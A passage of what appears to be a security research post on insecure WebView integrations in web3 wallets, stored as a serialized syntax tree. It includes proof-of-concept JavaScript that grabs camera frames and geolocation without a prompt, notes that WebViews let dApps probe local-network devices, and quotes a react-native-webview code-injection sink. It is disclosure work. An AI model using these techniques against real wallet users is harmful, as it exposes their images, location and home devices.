video",{"type":28,"tag":116,"props":1189,"children":1190},{"style":370},[1191],{"type":33,"value":141},{"type":28,"tag":116,"props":1193,"children":1194},{"style":272},[1195],{"type":33,"value":1196},"srcObject",{"type":28,"tag":116,"props":1198,"children":1199},{"style":370},[1200],{"type":33,"value":926},{"type":28,"tag":116,"props":1202,"children":1203},{"style":272},[1204],{"type":33,"value":1205},"stream",{"type":28,"tag":116,"props":1207,"children":1208},{"style":370},[1209],{"type":33,"value":384},{"type":28,"tag":116,"props":1211,"children":1213},{"class":245,"line":1212},25,[1214,1218,1223,1227,1231,1235,1239,1243,1248],{"type":28,"tag":116,"props":1215,"children":1216},{"style":376},[1217],{"type":33,"value":1077},{"type":28,"tag":116,"props":1219,"children":1220},{"style":272},[1221],{"type":33,"value":1222}," canvas",{"type":28,"tag":116,"props":1224,"children":1225},{"style":370},[1226],{"type":33,"value":926},{"type":28,"tag":116,"props":1228,"children":1229},{"style":272},[1230],{"type":33,"value":1156},{"type":28,"tag":116,"props":1232,"children":1233},{"style":370},[1234],{"type":33,"value":141},{"type":28,"tag":116,"props":1236,"children":1237},{"style":282},[1238],{"type":33,"value":1165},{"type":28,"tag":116,"props":1240,"children":1241},{"style":370},[1242],{"type":33,"value":313},{"type":28,"tag":116,"props":1244,"children":1245},{"style":563},[1246],{"type":33,"value":1247},"\"canvas\"",{"type":28,"tag":116,"props":1249,"children":1250},{"style":370},[1251],{"type":33,"value":895},{"type":28,"tag":116,"props":1253,"children":1255},{"class":245,"line":1254},26,[1256],{"type":28,"tag":116,"props":1257,"children":1258},{"emptyLinePlaceholder":19},[1259],{"type":33,"value":1044},{"type":28,"tag":116,"props":1261,"children":1263},{"class":245,"line":1262},27,[1264,1268,1272,1277,1282,1287],{"type":28,"tag":116,"props":1265,"children":1266},{"style":272},[1267],{"type":33,"value":1187},{"type":28,"tag":116,"props":1269,"children":1270},{"style":370},[1271],{"type":33,"value":141},{"type":28,"tag":116,"props":1273,"children":1274},{"style":282},[1275],{"type":33,"value":1276},"onloadedmetadata",{"type":28,"tag":116,"props":1278,"children":1279},{"style":370},[1280],{"type":33,"value":1281}," = () ",{"type":28,"tag":116,"props":1283,"children":1284},{"style":376},[1285],{"type":33,"value":1286},"=>",{"type":28,"tag":116,"props":1288,"children":1289},{"style":370},[1290],{"type":33,"value":1291}," {\n",{"type":28,"tag":116,"props":1293,"children":1295},{"class":245,"line":1294},28,[1296,1301,1305,1310,1314,1319,1323,1328],{"type":28,"tag":116,"props":1297,"children":1298},{"style":272},[1299],{"type":33,"value":1300},"                canvas",{"type":28,"tag":116,"props":1302,"children":1303},{"style":370},[1304],{"type":33,"value":141},{"type":28,"tag":116,"props":1306,"children":1307},{"style":272},[1308],{"type":33,"value":1309},"width",{"type":28,"tag":116,"props":1311,"children":1312},{"style":370},[1313],{"type":33,"value":926},{"type":28,"tag":116,"props":1315,"children":1316},{"style":272},[1317],{"type":33,"value":1318},"video",{"type":28,"tag":116,"props":1320,"children":1321},{"style":370},[1322],{"type":33,"value":141},{"type":28,"tag":116,"props":1324,"children":1325},{"style":272},[1326],{"type":33,"value":1327},"videoWidth",{"type":28,"tag":116,"props":1329,"children":1330},{"style":370},[1331],{"type":33,"value":384},{"type":28,"tag":116,"props":1333,"children":1335},{"class":245,"line":1334},29,[1336,1340,1344,1349,1353,1357,1361,1366],{"type":28,"tag":116,"props":1337,"children":1338},{"style":272},[1339],{"type":33,"value":1300},{"type":28,"tag":116,"props":1341,"children":1342},{"style":370},[1343],{"type":33,"value":141},{"type":28,"tag":116,"props":1345,"children":1346},{"style":272},[1347],{"type":33,"value":1348},"height",{"type":28,"tag":116,"props":1350,"children":1351},{"style":370},[1352],{"type":33,"value":926},{"type":28,"tag":116,"props":1354,"children":1355},{"style":272},[1356],{"type":33,"value":1318},{"type":28,"tag":116,"props":1358,"children":1359},{"style":370},[1360],{"type":33,"value":141},{"type":28,"tag":116,"props":1362,"children":1363},{"style":272},[1364],{"type":33,"value":1365},"videoHeight",{"type":28,"tag":116,"props":1367,"children":1368},{"style":370},[1369],{"type":33,"value":384},{"type":28,"tag":116,"props":1371,"children":1373},{"class":245,"line":1372},30,[1374],{"type":28,"tag":116,"props":1375,"children":1376},{"style":370},[1377],{"type":33,"value":1378},"            };\n",{"type":28,"tag":116,"props":1380,"children":1382},{"class":245,"line":1381},31,[1383],{"type":28,"tag":116,"props":1384,"children":1385},{"emptyLinePlaceholder":19},[1386],{"type":33,"value":1044},{"type":28,"tag":116,"props":1388,"children":1390},{"class":245,"line":1389},32,[1391,1396,1400,1405,1409,1414,1419],{"type":28,"tag":116,"props":1392,"children":1393},{"style":272},[1394],{"type":33,"value":1395},"            connect",{"type":28,"tag":116,"props":1397,"children":1398},{"style":370},[1399],{"type":33,"value":141},{"type":28,"tag":116,"props":1401,"children":1402},{"style":282},[1403],{"type":33,"value":1404},"onclick",{"type":28,"tag":116,"props":1406,"children":1407},{"style":370},[1408],{"type":33,"value":926},{"type":28,"tag":116,"props":1410,"children":1411},{"style":272},[1412],{"type":33,"value":1413},"e",{"type":28,"tag":116,"props":1415,"children":1416},{"style":376},[1417],{"type":33,"value":1418}," =>",{"type":28,"tag":116,"props":1420,"children":1421},{"style":370},[1422],{"type":33,"value":1291},{"type":28,"tag":116,"props":1424,"children":1426},{"class":245,"line":1425},33,[1427,1432,1436,1441],{"type":28,"tag":116,"props":1428,"children":1429},{"style":272},[1430],{"type":33,"value":1431},"                video",{"type":28,"tag":116,"props":1433,"children":1434},{"style":370},[1435],{"type":33,"value":141},{"type":28,"tag":116,"props":1437,"children":1438},{"style":282},[1439],{"type":33,"value":1440},"play",{"type":28,"tag":116,"props":1442,"children":1443},{"style":370},[1444],{"type":33,"value":1445},"();\n",{"type":28,"tag":116,"props":1447,"children":1449},{"class":245,"line":1448},34,[1450],{"type":28,"tag":116,"props":1451,"children":1452},{"emptyLinePlaceholder":19},[1453],{"type":33,"value":1044},{"type":28,"tag":116,"props":1455,"children":1457},{"class":245,"line":1456},35,[1458,1462,1466,1471,1475,1480,1485,1490,1494,1498,1502,1506,1510,1514],{"type":28,"tag":116,"props":1459,"children":1460},{"style":272},[1461],{"type":33,"value":1300},{"type":28,"tag":116,"props":1463,"children":1464},{"style":370},[1465],{"type":33,"value":141},{"type":28,"tag":116,"props":1467,"children":1468},{"style":282},[1469],{"type":33,"value":1470},"getContext",{"type":28,"tag":116,"props":1472,"children":1473},{"style":370},[1474],{"type":33,"value":313},{"type":28,"tag":116,"props":1476,"children":1477},{"style":563},[1478],{"type":33,"value":1479},"\"2d\"",{"type":28,"tag":116,"props":1481,"children":1482},{"style":370},[1483],{"type":33,"value":1484},").",{"type":28,"tag":116,"props":1486,"children":1487},{"style":282},[1488],{"type":33,"value":1489},"drawImage",{"type":28,"tag":116,"props":1491,"children":1492},{"style":370},[1493],{"type":33,"value":313},{"type":28,"tag":116,"props":1495,"children":1496},{"style":272},[1497],{"type":33,"value":1318},{"type":28,"tag":116,"props":1499,"children":1500},{"style":370},[1501],{"type":33,"value":825},{"type":28,"tag":116,"props":1503,"children":1504},{"style":350},[1505],{"type":33,"value":353},{"type":28,"tag":116,"props":1507,"children":1508},{"style":370},[1509],{"type":33,"value":825},{"type":28,"tag":116,"props":1511,"children":1512},{"style":350},[1513],{"type":33,"value":353},{"type":28,"tag":116,"props":1515,"children":1516},{"style":370},[1517],{"type":33,"value":895},{"type":28,"tag":116,"props":1519,"children":1521},{"class":245,"line":1520},36,[1522,1527,1531,1536,1541,1546,1550,1555,1559,1564,1568,1573],{"type":28,"tag":116,"props":1523,"children":1524},{"style":272},[1525],{"type":33,"value":1526},"                stream",{"type":28,"tag":116,"props":1528,"children":1529},{"style":370},[1530],{"type":33,"value":141},{"type":28,"tag":116,"props":1532,"children":1533},{"style":282},[1534],{"type":33,"value":1535},"getTracks",{"type":28,"tag":116,"props":1537,"children":1538},{"style":370},[1539],{"type":33,"value":1540},"().",{"type":28,"tag":116,"props":1542,"children":1543},{"style":282},[1544],{"type":33,"value":1545},"forEach",{"type":28,"tag":116,"props":1547,"children":1548},{"style":370},[1549],{"type":33,"value":313},{"type":28,"tag":116,"props":1551,"children":1552},{"style":272},[1553],{"type":33,"value":1554},"t",{"type":28,"tag":116,"props":1556,"children":1557},{"style":376},[1558],{"type":33,"value":1418},{"type":28,"tag":116,"props":1560,"children":1561},{"style":272},[1562],{"type":33,"value":1563}," t",{"type":28,"tag":116,"props":1565,"children":1566},{"style":370},[1567],{"type":33,"value":141},{"type":28,"tag":116,"props":1569,"children":1570},{"style":282},[1571],{"type":33,"value":1572},"stop",{"type":28,"tag":116,"props":1574,"children":1575},{"style":370},[1576],{"type":33,"value":1577},"());\n",{"type":28,"tag":116,"props":1579,"children":1581},{"class":245,"line":1580},37,[1582,1586,1590,1595,1600,1605,1610,1614],{"type":28,"tag":116,"props":1583,"children":1584},{"style":272},[1585],{"type":33,"value":1300},{"type":28,"tag":116,"props":1587,"children":1588},{"style":370},[1589],{"type":33,"value":141},{"type":28,"tag":116,"props":1591,"children":1592},{"style":282},[1593],{"type":33,"value":1594},"toBlob",{"type":28,"tag":116,"props":1596,"children":1597},{"style":370},[1598],{"type":33,"value":1599},"((",{"type":28,"tag":116,"props":1601,"children":1602},{"style":272},[1603],{"type":33,"value":1604},"blob",{"type":28,"tag":116,"props":1606,"children":1607},{"style":370},[1608],{"type":33,"value":1609},") ",{"type":28,"tag":116,"props":1611,"children":1612},{"style":376},[1613],{"type":33,"value":1286},{"type":28,"tag":116,"props":1615,"children":1616},{"style":370},[1617],{"type":33,"value":1291},{"type":28,"tag":116,"props":1619,"children":1621},{"class":245,"line":1620},38,[1622,1627,1631,1636,1640,1645,1649,1654,1658,1662],{"type":28,"tag":116,"props":1623,"children":1624},{"style":272},[1625],{"type":33,"value":1626},"                    pic",{"type":28,"tag":116,"props":1628,"children":1629},{"style":370},[1630],{"type":33,"value":141},{"type":28,"tag":116,"props":1632,"children":1633},{"style":272},[1634],{"type":33,"value":1635},"src",{"type":28,"tag":116,"props":1637,"children":1638},{"style":370},[1639],{"type":33,"value":926},{"type":28,"tag":116,"props":1641,"children":1642},{"style":272},[1643],{"type":33,"value":1644},"URL",{"type":28,"tag":116,"props":1646,"children":1647},{"style":370},[1648],{"type":33,"value":141},{"type":28,"tag":116,"props":1650,"children":1651},{"style":282},[1652],{"type":33,"value":1653},"createObjectURL",{"type":28,"tag":116,"props":1655,"children":1656},{"style":370},[1657],{"type":33,"value":313},{"type":28,"tag":116,"props":1659,"children":1660},{"style":272},[1661],{"type":33,"value":1604},{"type":28,"tag":116,"props":1663,"children":1664},{"style":370},[1665],{"type":33,"value":895},{"type":28,"tag":116,"props":1667,"children":1669},{"class":245,"line":1668},39,[1670],{"type":28,"tag":116,"props":1671,"children":1672},{"style":370},[1673],{"type":33,"value":1674},"                });\n",{"type":28,"tag":116,"props":1676,"children":1678},{"class":245,"line":1677},40,[1679],{"type":28,"tag":116,"props":1680,"children":1681},{"emptyLinePlaceholder":19},[1682],{"type":33,"value":1044},{"type":28,"tag":116,"props":1684,"children":1686},{"class":245,"line":1685},41,[1687,1692,1696,1701,1705,1710,1714,1719,1723],{"type":28,"tag":116,"props":1688,"children":1689},{"style":272},[1690],{"type":33,"value":1691},"                navigator",{"type":28,"tag":116,"props":1693,"children":1694},{"style":370},[1695],{"type":33,"value":141},{"type":28,"tag":116,"props":1697,"children":1698},{"style":272},[1699],{"type":33,"value":1700},"geolocation",{"type":28,"tag":116,"props":1702,"children":1703},{"style":370},[1704],{"type":33,"value":141},{"type":28,"tag":116,"props":1706,"children":1707},{"style":282},[1708],{"type":33,"value":1709},"getCurrentPosition",{"type":28,"tag":116,"props":1711,"children":1712},{"style":370},[1713],{"type":33,"value":313},{"type":28,"tag":116,"props":1715,"children":1716},{"style":272},[1717],{"type":33,"value":1718},"pos",{"type":28,"tag":116,"props":1720,"children":1721},{"style":376},[1722],{"type":33,"value":1418},{"type":28,"tag":116,"props":1724,"children":1725},{"style":370},[1726],{"type":33,"value":1291},{"type":28,"tag":116,"props":1728,"children":1730},{"class":245,"line":1729},42,[1731,1736,1741,1745,1749,1753,1758],{"type":28,"tag":116,"props":1732,"children":1733},{"style":376},[1734],{"type":33,"value":1735},"                    const",{"type":28,"tag":116,"props":1737,"children":1738},{"style":272},[1739],{"type":33,"value":1740}," c",{"type":28,"tag":116,"props":1742,"children":1743},{"style":370},[1744],{"type":33,"value":926},{"type":28,"tag":116,"props":1746,"children":1747},{"style":272},[1748],{"type":33,"value":1718},{"type":28,"tag":116,"props":1750,"children":1751},{"style":370},[1752],{"type":33,"value":141},{"type":28,"tag":116,"props":1754,"children":1755},{"style":272},[1756],{"type":33,"value":1757},"coords",{"type":28,"tag":116,"props":1759,"children":1760},{"style":370},[1761],{"type":33,"value":384},{"type":28,"tag":116,"props":1763,"children":1765},{"class":245,"line":1764},43,[1766,1771,1775,1780,1784,1789,1793,1798,1802,1807,1811,1816,1820,1825,1830,1834,1840,1845,1849,1853,1857,1862,1866,1870,1874,1878,1882,1886,1890],{"type":28,"tag":116,"props":1767,"children":1768},{"style":272},[1769],{"type":33,"value":1770},"                    gps",{"type":28,"tag":116,"props":1772,"children":1773},{"style":370},[1774],{"type":33,"value":141},{"type":28,"tag":116,"props":1776,"children":1777},{"style":272},[1778],{"type":33,"value":1779},"innerText",{"type":28,"tag":116,"props":1781,"children":1782},{"style":370},[1783],{"type":33,"value":926},{"type":28,"tag":116,"props":1785,"children":1786},{"style":563},[1787],{"type":33,"value":1788},"`Lat: ",{"type":28,"tag":116,"props":1790,"children":1791},{"style":376},[1792],{"type":33,"value":867},{"type":28,"tag":116,"props":1794,"children":1795},{"style":272},[1796],{"type":33,"value":1797},"c",{"type":28,"tag":116,"props":1799,"children":1800},{"style":370},[1801],{"type":33,"value":141},{"type":28,"tag":116,"props":1803,"children":1804},{"style":272},[1805],{"type":33,"value":1806},"latitude",{"type":28,"tag":116,"props":1808,"children":1809},{"style":370},[1810],{"type":33,"value":141},{"type":28,"tag":116,"props":1812,"children":1813},{"style":282},[1814],{"type":33,"value":1815},"toFixed",{"type":28,"tag":116,"props":1817,"children":1818},{"style":370},[1819],{"type":33,"value":313},{"type":28,"tag":116,"props":1821,"children":1822},{"style":350},[1823],{"type":33,"value":1824},"1",{"type":28,"tag":116,"props":1826,"children":1827},{"style":370},[1828],{"type":33,"value":1829},")",{"type":28,"tag":116,"props":1831,"children":1832},{"style":376},[1833],{"type":33,"value":885},{"type":28,"tag":116,"props":1835,"children":1837},{"style":1836},"--shiki-default:#D7BA7D",[1838],{"type":33,"value":1839},"\\n",{"type":28,"tag":116,"props":1841,"children":1842},{"style":563},[1843],{"type":33,"value":1844},"Lon: ",{"type":28,"tag":116,"props":1846,"children":1847},{"style":376},[1848],{"type":33,"value":867},{"type":28,"tag":116,"props":1850,"children":1851},{"style":272},[1852],{"type":33,"value":1797},{"type":28,"tag":116,"props":1854,"children":1855},{"style":370},[1856],{"type":33,"value":141},{"type":28,"tag":116,"props":1858,"children":1859},{"style":272},[1860],{"type":33,"value":1861},"longitude",{"type":28,"tag":116,"props":1863,"children":1864},{"style":370},[1865],{"type":33,"value":141},{"type":28,"tag":116,"props":1867,"children":1868},{"style":282},[1869],{"type":33,"value":1815},{"type":28,"tag":116,"props":1871,"children":1872},{"style":370},[1873],{"type":33,"value":313},{"type":28,"tag":116,"props":1875,"children":1876},{"style":350},[1877],{"type":33,"value":1824},{"type":28,"tag":116,"props":1879,"children":1880},{"style":370},[1881],{"type":33,"value":1829},{"type":28,"tag":116,"props":1883,"children":1884},{"style":376},[1885],{"type":33,"value":885},{"type":28,"tag":116,"props":1887,"children":1888},{"style":563},[1889],{"type":33,"value":890},{"type":28,"tag":116,"props":1891,"children":1892},{"style":370},[1893],{"type":33,"value":384},{"type":28,"tag":116,"props":1895,"children":1897},{"class":245,"line":1896},44,[1898,1903,1908,1912,1917,1921,1925],{"type":28,"tag":116,"props":1899,"children":1900},{"style":370},[1901],{"type":33,"value":1902},"                }, ",{"type":28,"tag":116,"props":1904,"children":1905},{"style":272},[1906],{"type":33,"value":1907},"err",{"type":28,"tag":116,"props":1909,"children":1910},{"style":376},[1911],{"type":33,"value":1418},{"type":28,"tag":116,"props":1913,"children":1914},{"style":282},[1915],{"type":33,"value":1916}," alert",{"type":28,"tag":116,"props":1918,"children":1919},{"style":370},[1920],{"type":33,"value":313},{"type":28,"tag":116,"props":1922,"children":1923},{"style":272},[1924],{"type":33,"value":1907},{"type":28,"tag":116,"props":1926,"children":1927},{"style":370},[1928],{"type":33,"value":1929},"));\n",{"type":28,"tag":116,"props":1931,"children":1933},{"class":245,"line":1932},45,[1934],{"type":28,"tag":116,"props":1935,"children":1936},{"style":370},[1937],{"type":33,"value":1378},{"type":28,"tag":116,"props":1939,"children":1941},{"class":245,"line":1940},46,[1942],{"type":28,"tag":116,"props":1943,"children":1944},{"emptyLinePlaceholder":19},[1945],{"type":33,"value":1044},{"type":28,"tag":116,"props":1947,"children":1949},{"class":245,"line":1948},47,[1950],{"type":28,"tag":116,"props":1951,"children":1952},{"style":370},[1953],{"type":33,"value":1954},"        }\n",{"type":28,"tag":116,"props":1956,"children":1958},{"class":245,"line":1957},48,[1959,1964],{"type":28,"tag":116,"props":1960,"children":1961},{"style":282},[1962],{"type":33,"value":1963},"        main",{"type":28,"tag":116,"props":1965,"children":1966},{"style":370},[1967],{"type":33,"value":1445},{"type":28,"tag":116,"props":1969,"children":1971},{"class":245,"line":1970},49,[1972,1977,1981],{"type":28,"tag":116,"props":1973,"children":1974},{"style":488},[1975],{"type":33,"value":1976},"    \u003C/",{"type":28,"tag":116,"props":1978,"children":1979},{"style":376},[1980],{"type":33,"value":789},{"type":28,"tag":116,"props":1982,"children":1983},{"style":488},[1984],{"type":33,"value":506},{"type":28,"tag":116,"props":1986,"children":1988},{"class":245,"line":1987},50,[1989,1993,1997],{"type":28,"tag":116,"props":1990,"children":1991},{"style":488},[1992],{"type":33,"value":603},{"type":28,"tag":116,"props":1994,"children":1995},{"style":376},[1996],{"type":33,"value":624},{"type":28,"tag":116,"props":1998,"children":1999},{"style":488},[2000],{"type":33,"value":506},{"type":28,"tag":116,"props":2002,"children":2004},{"class":245,"line":2003},51,[2005,2009,2013],{"type":28,"tag":116,"props":2006,"children":2007},{"style":488},[2008],{"type":33,"value":603},{"type":28,"tag":116,"props":2010,"children":2011},{"style":376},[2012],{"type":33,"value":478},{"type":28,"tag":116,"props":2014,"children":2015},{"style":488},[2016],{"type":33,"value":506},{"type":28,"tag":443,"props":2018,"children":2020},{"id":2019},"patch",[2021],{"type":33,"value":2022},"Patch",{"type":28,"tag":29,"props":2024,"children":2025},{},[2026],{"type":33,"value":2027},"Unfortunately, there's no simple solution for fixing this vulnerability, as most libraries don't offer an easy to enable feature flag. Each wallet should be mindful of the libraries they use and subsequently manually implement measures to mitigate this.",{"type":28,"tag":29,"props":2029,"children":2030},{},[2031,2033,2040],{"type":33,"value":2032},"A good baseline for patches like this is Metamask. Their patch for React Native WebView can be found ",{"type":28,"tag":87,"props":2034,"children":2037},{"href":2035,"rel":2036},"https://github.com/MetaMask/metamask-mobile/blob/53e205520cd571e84fbb443470a6e3654650bad4/.yarn/patches/%40metamask-react-native-webview-npm-14.5.0-b34fed6d50.patch#L13",[91],[2038],{"type":33,"value":2039},"here",{"type":33,"value":141},{"type":28,"tag":201,"props":2042,"children":2043},{"style":203},[2044],{"type":28,"tag":206,"props":2045,"children":2049},{"src":2046,"alt":2047,"style":2048},"/posts/insecure-webview-integrations/image2.png","Private Network Access desktop prompt","max-height:144px; width:auto; max-width:100%;",[],{"type":28,"tag":29,"props":2051,"children":2052},{},[2053],{"type":33,"value":2054},"However, even with this patch applied, the user experience is suboptimal. Since there's no cache mechanism for preserving the users' choice, various clickjacking scenarios can be instantiated for further tricking the user into a permission approval.",{"type":28,"tag":63,"props":2056,"children":2058},{"id":2057},"local-network-access",[2059],{"type":33,"value":2060},"Local Network Access",{"type":28,"tag":29,"props":2062,"children":2063},{},[2064,2066,2073,2075,2081],{"type":33,"value":2065},"Modern browsers like Chrome have introduced strict protections around access to a user's local network. When a webpage attempts to send requests to servers on the local network or any private IP range, Chrome will prompt the user for explicit permission before allowing the request to proceed. This is part of the ",{"type":28,"tag":87,"props":2067,"children":2070},{"href":2068,"rel":2069},"https://wicg.github.io/private-network-access/",[91],[2071],{"type":33,"value":2072},"Private Network Access",{"type":33,"value":2074}," specification, and the permission prompt is deliberately restricted to secure contexts (HTTPS) to prevent insecure pages from using local network access as a stepping stone to more serious attacks like remote code execution. There are numerous examples available online detailing the implications of these protections ",{"type":28,"tag":87,"props":2076,"children":2079},{"href":2077,"rel":2078},"https://x.com/taviso/status/2051310678800253318",[91],[2080],{"type":33,"value":2077},{"type":33,"value":2082},". Google's Chrome was one of the first browsers to implement this protection on their desktop application.",{"type":28,"tag":201,"props":2084,"children":2085},{"style":203},[2086],{"type":28,"tag":206,"props":2087,"children":2090},{"src":2088,"alt":2047,"style":2089},"/posts/insecure-webview-integrations/image3.png","max-height:240px; width:auto; max-width:100%;",[],{"type":28,"tag":29,"props":2092,"children":2093},{},[2094],{"type":33,"value":2095},"WebViews, however, do not enforce this restriction. When a dApp is loaded inside a wallet's WebView, it can freely send requests to any host on the user's local network, including routers, NAS devices, smart home hubs, IP cameras, or any other IoT device without triggering any permission prompt whatsoever. The user has no visibility into this happening. See an example of this below.",{"type":28,"tag":2097,"props":2098,"children":2101},"zoom-image",{"src":2099,"alt":2100},"/posts/insecure-webview-integrations/image4.png","Private Network Access demo",[],{"type":28,"tag":29,"props":2103,"children":2104},{},[2105],{"type":33,"value":2106},"The consequences can increase the impact of certain issues. Local network devices are frequently unpatched, rely on default credentials, and expose administrative interfaces that were never designed to be reachable from an external webpage. An attacker-controlled dApp could:",{"type":28,"tag":2108,"props":2109,"children":2110},"ul",{},[2111,2116,2121],{"type":28,"tag":459,"props":2112,"children":2113},{},[2114],{"type":33,"value":2115},"Exfiltrate device information from admin panels or unauthenticated API endpoints exposed by routers or IoT devices.",{"type":28,"tag":459,"props":2117,"children":2118},{},[2119],{"type":33,"value":2120},"Perform authenticated actions against devices that rely on network-locality as their only access control (a common pattern in consumer IoT).",{"type":28,"tag":459,"props":2122,"children":2123},{},[2124],{"type":33,"value":2125},"Exploit known CVEs in firmware by sending crafted requests to a device whose vulnerability is already public, potentially achieving remote code execution on that device.",{"type":28,"tag":29,"props":2127,"children":2128},{},[2129],{"type":33,"value":2130},"A user who has installed a reputable web3 wallet has no reason to suspect that browsing via a malicious dApp within that wallet could result in their home devices being probed.",{"type":28,"tag":63,"props":2132,"children":2134},{"id":2133},"uxss-by-code-injection",[2135],{"type":33,"value":2136},"UXSS by Code Injection",{"type":28,"tag":29,"props":2138,"children":2139},{},[2140,2142,2148],{"type":33,"value":2141},"Another sink we found in react-native-webview by just skimming through the code was how the ",{"type":28,"tag":98,"props":2143,"children":2145},{"className":2144},[],[2146],{"type":33,"value":2147},"injectJavascriptObject",{"type":33,"value":2149}," attribute worked. Here is the code snippet:",{"type":28,"tag":234,"props":2151,"children":2153},{"className":236,"code":2152,"language":238,"meta":7,"style":7},"    private void injectJavascriptObject() {\n      if (getSettings().getJavaScriptEnabled()) {\n        String js = \"(function(){\\n\" +\n          \"    window.\" + JAVASCRIPT_INTERFACE + \" = window.\" + JAVASCRIPT_INTERFACE + \" || {};\\n\" +\n          \"    window.\" + JAVASCRIPT_INTERFACE + \".injectedObjectJson = function () { return \" + (injectedJavaScriptObject == null ? null : (\"`\" + injectedJavaScriptObject + \"`\")) + \"; };\\n\" +\n          \"})();\";\n        evaluateJavascriptWithFallback(js);\n      }\n",[2154],{"type":28,"tag":98,"props":2155,"children":2156},{"__ignoreMap":7},[2157,2179,2209,2246,2303,2412,2424,2437],{"type":28,"tag":116,"props":2158,"children":2159},{"class":245,"line":246},[2160,2165,2170,2175],{"type":28,"tag":116,"props":2161,"children":2162},{"style":376},[2163],{"type":33,"value":2164},"    private",{"type":28,"tag":116,"props":2166,"children":2167},{"style":339},[2168],{"type":33,"value":2169}," void",{"type":28,"tag":116,"props":2171,"children":2172},{"style":282},[2173],{"type":33,"value":2174}," injectJavascriptObject",{"type":28,"tag":116,"props":2176,"children":2177},{"style":266},[2178],{"type":33,"value":1068},{"type":28,"tag":116,"props":2180,"children":2181},{"class":245,"line":256},[2182,2187,2191,2196,2200,2205],{"type":28,"tag":116,"props":2183,"children":2184},{"style":260},[2185],{"type":33,"value":2186},"      if",{"type":28,"tag":116,"props":2188,"children":2189},{"style":266},[2190],{"type":33,"value":269},{"type":28,"tag":116,"props":2192,"children":2193},{"style":282},[2194],{"type":33,"value":2195},"getSettings",{"type":28,"tag":116,"props":2197,"children":2198},{"style":266},[2199],{"type":33,"value":1540},{"type":28,"tag":116,"props":2201,"children":2202},{"style":282},[2203],{"type":33,"value":2204},"getJavaScriptEnabled",{"type":28,"tag":116,"props":2206,"children":2207},{"style":266},[2208],{"type":33,"value":290},{"type":28,"tag":116,"props":2210,"children":2211},{"class":245,"line":293},[2212,2217,2222,2227,2232,2236,2241],{"type":28,"tag":116,"props":2213,"children":2214},{"style":339},[2215],{"type":33,"value":2216},"        String",{"type":28,"tag":116,"props":2218,"children":2219},{"style":272},[2220],{"type":33,"value":2221}," js",{"type":28,"tag":116,"props":2223,"children":2224},{"style":370},[2225],{"type":33,"value":2226}," =",{"type":28,"tag":116,"props":2228,"children":2229},{"style":563},[2230],{"type":33,"value":2231}," \"(function(){",{"type":28,"tag":116,"props":2233,"children":2234},{"style":1836},[2235],{"type":33,"value":1839},{"type":28,"tag":116,"props":2237,"children":2238},{"style":563},[2239],{"type":33,"value":2240},"\"",{"type":28,"tag":116,"props":2242,"children":2243},{"style":370},[2244],{"type":33,"value":2245}," +\n",{"type":28,"tag":116,"props":2247,"children":2248},{"class":245,"line":361},[2249,2254,2259,2264,2269,2274,2278,2282,2286,2291,2295,2299],{"type":28,"tag":116,"props":2250,"children":2251},{"style":563},[2252],{"type":33,"value":2253},"          \"    window.\"",{"type":28,"tag":116,"props":2255,"children":2256},{"style":370},[2257],{"type":33,"value":2258}," +",{"type":28,"tag":116,"props":2260,"children":2261},{"style":266},[2262],{"type":33,"value":2263}," JAVASCRIPT_INTERFACE ",{"type":28,"tag":116,"props":2265,"children":2266},{"style":370},[2267],{"type":33,"value":2268},"+",{"type":28,"tag":116,"props":2270,"children":2271},{"style":563},[2272],{"type":33,"value":2273}," \" = window.\"",{"type":28,"tag":116,"props":2275,"children":2276},{"style":370},[2277],{"type":33,"value":2258},{"type":28,"tag":116,"props":2279,"children":2280},{"style":266},[2281],{"type":33,"value":2263},{"type":28,"tag":116,"props":2283,"children":2284},{"style":370},[2285],{"type":33,"value":2268},{"type":28,"tag":116,"props":2287,"children":2288},{"style":563},[2289],{"type":33,"value":2290}," \" || {};",{"type":28,"tag":116,"props":2292,"children":2293},{"style":1836},[2294],{"type":33,"value":1839},{"type":28,"tag":116,"props":2296,"children":2297},{"style":563},[2298],{"type":33,"value":2240},{"type":28,"tag":116,"props":2300,"children":2301},{"style":370},[2302],{"type":33,"value":2245},{"type":28,"tag":116,"props":2304,"children":2305},{"class":245,"line":387},[2306,2310,2314,2318,2322,2327,2331,2336,2341,2345,2350,2354,2359,2363,2368,2372,2377,2381,2386,2391,2395,2400,2404,2408],{"type":28,"tag":116,"props":2307,"children":2308},{"style":563},[2309],{"type":33,"value":2253},{"type":28,"tag":116,"props":2311,"children":2312},{"style":370},[2313],{"type":33,"value":2258},{"type":28,"tag":116,"props":2315,"children":2316},{"style":266},[2317],{"type":33,"value":2263},{"type":28,"tag":116,"props":2319,"children":2320},{"style":370},[2321],{"type":33,"value":2268},{"type":28,"tag":116,"props":2323,"children":2324},{"style":563},[2325],{"type":33,"value":2326}," \".injectedObjectJson = function () { return \"",{"type":28,"tag":116,"props":2328,"children":2329},{"style":370},[2330],{"type":33,"value":2258},{"type":28,"tag":116,"props":2332,"children":2333},{"style":266},[2334],{"type":33,"value":2335}," (injectedJavaScriptObject ",{"type":28,"tag":116,"props":2337,"children":2338},{"style":370},[2339],{"type":33,"value":2340},"==",{"type":28,"tag":116,"props":2342,"children":2343},{"style":376},[2344],{"type":33,"value":379},{"type":28,"tag":116,"props":2346,"children":2347},{"style":260},[2348],{"type":33,"value":2349}," ?",{"type":28,"tag":116,"props":2351,"children":2352},{"style":376},[2353],{"type":33,"value":379},{"type":28,"tag":116,"props":2355,"children":2356},{"style":260},[2357],{"type":33,"value":2358}," :",{"type":28,"tag":116,"props":2360,"children":2361},{"style":266},[2362],{"type":33,"value":269},{"type":28,"tag":116,"props":2364,"children":2365},{"style":563},[2366],{"type":33,"value":2367},"\"`\"",{"type":28,"tag":116,"props":2369,"children":2370},{"style":370},[2371],{"type":33,"value":2258},{"type":28,"tag":116,"props":2373,"children":2374},{"style":266},[2375],{"type":33,"value":2376}," injectedJavaScriptObject ",{"type":28,"tag":116,"props":2378,"children":2379},{"style":370},[2380],{"type":33,"value":2268},{"type":28,"tag":116,"props":2382,"children":2383},{"style":563},[2384],{"type":33,"value":2385}," \"`\"",{"type":28,"tag":116,"props":2387,"children":2388},{"style":266},[2389],{"type":33,"value":2390},")) ",{"type":28,"tag":116,"props":2392,"children":2393},{"style":370},[2394],{"type":33,"value":2268},{"type":28,"tag":116,"props":2396,"children":2397},{"style":563},[2398],{"type":33,"value":2399}," \"; 